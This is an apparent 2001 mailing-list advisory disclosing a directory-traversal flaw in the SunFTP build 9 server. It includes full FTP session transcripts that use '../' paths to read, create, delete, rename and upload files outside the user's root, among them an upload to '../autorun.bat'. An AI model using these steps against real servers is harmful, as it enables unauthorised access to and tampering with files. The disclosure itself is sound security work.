Date: Fri, 2 Mar 2001 12:14:23 -0000
From: [email protected]
To: [email protected]Subject: Sunftp build9(1) - ftp server Vulnerability
It is possible to break out of the root directory by
using relative paths
e:\crap was used as homedir. of user test.
#the get command#
getting files from outside of the root dir.
220 chris FTP Server (SunFTP b9) ready on port 21...
Benutzer (10.17.3.44:(none)): test
331 Password required for test.
Kennwort:
230 User test logged in.
ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 .
drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 ..
-rw-rw-rw- 1 ftp ftp 0 Mar 02 11:21 test.txt
226 File sent ok
FTP: 179 Bytes empfangen in 0,00Sekunden
179000,00KB/s
ftp> cd ..
501 CWD failed. No permission
ftp> get ../sunftptest.txt
200 Port command successful.
150 Opening data connection for ../sunftptest.txt.
226 File sent ok
FTP: 1443 Bytes empfangen in 0,00Sekunden
1443000,00KB/s
#the mkdir command#
without priv. to create directories:
ftp> mkdir test
550 '/test': can't create directory.
ftp> mkdir ../test
257 '/../test': directory created.
hell!it's getting worse...
#the rmdir command#
without any priv. to remove anything
ftp> rmdir ../test
250 '/../test': directory removed.
this only works with empty directories
#the rename command#
it is possible to rename files outside of the root
directory without
permissions.And it is also possible to move files with
the rename command,
when the filename is known.
ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 .
drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 ..
-rw-rw-rw- 1 ftp ftp 0 Mar 02 11:21
grmbl.txt
drw-rw-rw- 1 ftp ftp 0 Mar 02 12:17 test
226 File sent ok
FTP: 240 Bytes empfangen in 0,00Sekunden
240000,00KB/s
ftp> cd ..
501 CWD failed. No permission
ftp> rename ../sunftptest.txt movedtohomedir.txt
350 File exists, ready for destination name.
250 File '/../sunftptest.txt' renamed
to '/movedtohomedir.txt'.
ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 .
drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 ..
-rw-rw-rw- 1 ftp ftp 0 Mar 02 11:21
grmbl.txt
drw-rw-rw- 1 ftp ftp 0 Mar 02 12:17 test
-rw-rw-rw- 1 ftp ftp 6 Mar 02 12:33
movedtohomedir.txt
226 File sent ok
FTP: 314 Bytes empfangen in 0,00Sekunden
314000,00KB/s
#the put command#
If you have permission to upload files, you can put
these files outside of
the homedir.
ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 .
drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 ..
-rw-rw-rw- 1 ftp ftp 0 Mar 02 11:21
grmbl.txt
drw-rw-rw- 1 ftp ftp 0 Mar 02 12:17 test
-rw-rw-rw- 1 ftp ftp 6 Mar 02 12:33
movedtohomedir.txt
226 File sent ok
FTP: 314 Bytes empfangen in 0,00Sekunden
314000,00KB/s
ftp> put
Lokale Datei c:\test.txt
Remotedatei test.txt
200 Port command successful.
150 Opening data connection for test.txt.
226 File received ok
ftp> put
Lokale Datei c:\test.txt
Remotedatei ../autorun.bat
200 Port command successful.
150 Opening data connection for ../autorun.bat.
226 File received ok
Solution
no quick bugfix. Use with care
I tried to contact the authors, but their webpage
seems to be down.
[email protected] or
[email protected]
